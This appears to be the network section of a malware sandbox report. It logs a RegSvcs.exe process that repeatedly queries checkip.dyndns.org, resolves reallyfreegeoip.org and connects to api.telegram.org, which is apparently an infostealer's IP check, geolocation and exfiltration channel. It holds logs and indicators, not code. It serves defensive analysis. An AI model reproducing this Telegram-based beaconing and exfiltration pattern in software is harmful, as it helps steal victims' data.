Jan 10, 2025 23:19:41.510946989 CET | 80 | 61858 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:41.511023045 CET | 61858 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:41.511126041 CET | 61858 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:41.515860081 CET | 80 | 61858 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:42.203093052 CET | 80 | 61858 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:42.204391003 CET | 61863 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:42.204487085 CET | 443 | 61863 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:42.204595089 CET | 61863 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:42.204835892 CET | 61863 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:42.204871893 CET | 443 | 61863 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:42.246139050 CET | 61858 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:42.658394098 CET | 443 | 61863 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:42.667645931 CET | 61863 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:42.667685032 CET | 443 | 61863 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:42.795073032 CET | 443 | 61863 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:42.795141935 CET | 443 | 61863 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:42.795222998 CET | 61863 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:42.795726061 CET | 61863 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:42.809214115 CET | 61858 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:42.814153910 CET | 80 | 61858 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:42.814230919 CET | 61858 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:42.820058107 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:42.820095062 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:42.820209026 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:42.820743084 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:42.820759058 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:43.454948902 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:43.455050945 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:43.456449032 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:43.456461906 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:43.456834078 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:43.458605051 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:43.499330044 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:43.603176117 CET | 49734 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:43.713975906 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:43.714071035 CET | 443 | 61868 | 149.154.167.220 | 192.168.2.6
Jan 10, 2025 23:19:43.714153051 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:43.716383934 CET | 61868 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 23:19:58.141113997 CET | 49845 | 80 | 192.168.2.6 | 132.226.247.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 23:19:16.061748981 CET | 52817 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 23:19:16.069133997 CET | 53 | 52817 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 23:19:17.022197962 CET | 54128 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 23:19:17.039062977 CET | 53 | 54128 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 23:19:28.213293076 CET | 51812 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 23:19:28.220693111 CET | 53 | 51812 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 23:19:39.862517118 CET | 53 | 55999 | 162.159.36.2 | 192.168.2.6
Jan 10, 2025 23:19:40.346451044 CET | 57727 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 23:19:40.353282928 CET | 53 | 57727 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 23:19:42.812287092 CET | 56419 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 23:19:42.819336891 CET | 53 | 56419 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 23:19:16.061748981 CET | 192.168.2.6 | 1.1.1.1 | 0x87de | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.022197962 CET | 192.168.2.6 | 1.1.1.1 | 0xe5d9 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:28.213293076 CET | 192.168.2.6 | 1.1.1.1 | 0x9a7f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:40.346451044 CET | 192.168.2.6 | 1.1.1.1 | 0x2e03 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 10, 2025 23:19:42.812287092 CET | 192.168.2.6 | 1.1.1.1 | 0x5d31 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 23:19:16.069133997 CET | 1.1.1.1 | 192.168.2.6 | 0x87de | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 23:19:16.069133997 CET | 1.1.1.1 | 192.168.2.6 | 0x87de | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:16.069133997 CET | 1.1.1.1 | 192.168.2.6 | 0x87de | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:16.069133997 CET | 1.1.1.1 | 192.168.2.6 | 0x87de | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:16.069133997 CET | 1.1.1.1 | 192.168.2.6 | 0x87de | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:16.069133997 CET | 1.1.1.1 | 192.168.2.6 | 0x87de | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.039062977 CET | 1.1.1.1 | 192.168.2.6 | 0xe5d9 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.039062977 CET | 1.1.1.1 | 192.168.2.6 | 0xe5d9 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.039062977 CET | 1.1.1.1 | 192.168.2.6 | 0xe5d9 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.039062977 CET | 1.1.1.1 | 192.168.2.6 | 0xe5d9 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.039062977 CET | 1.1.1.1 | 192.168.2.6 | 0xe5d9 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.039062977 CET | 1.1.1.1 | 192.168.2.6 | 0xe5d9 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:17.039062977 CET | 1.1.1.1 | 192.168.2.6 | 0xe5d9 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:28.220693111 CET | 1.1.1.1 | 192.168.2.6 | 0x9a7f | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:19:40.353282928 CET | 1.1.1.1 | 192.168.2.6 | 0x2e03 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 10, 2025 23:19:42.819336891 CET | 1.1.1.1 | 192.168.2.6 | 0x5d31 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49716 | 132.226.247.73 | 80 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:16.084886074 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:16.757812023 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:16 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:19:16.762742996 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:19:16.972708941 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:16 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:19:17.741214991 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:19:17.949717045 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49734 | 132.226.247.73 | 80 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:18.698031902 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:19:19.403620005 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49746 | 132.226.247.73 | 80 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:20.076575041 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:20.768685102 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:20 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49756 | 132.226.247.73 | 80 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:21.408927917 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:22.123766899 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:22 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49765 | 132.226.247.73 | 80 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:22.787517071 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:23.523907900 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:23 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49777 | 132.226.247.73 | 80 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:24.185946941 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:24.873136997 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
6 | 192.168.2.6 | 49790 | 132.226.247.73 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:25.544445992 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:26.244102955 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49800 | 132.226.247.73 | 80 | 1672 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:26.890674114 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:27.570959091 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49826 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:31.133126020 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:19:31.804013014 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:19:31.807331085 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:19:32.016213894 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:19:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:19:32.716073990 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:19:32.949526072 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:32 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49845 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:33.608896017 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 10, 2025 23:19:34.301940918 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:34 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49856 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:34.921372890 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:19:35.617870092 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:35 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49868 | 132.226.247.73 | 80 | 7076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:19:36.266180992 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:19:36.947066069 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:19:36 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


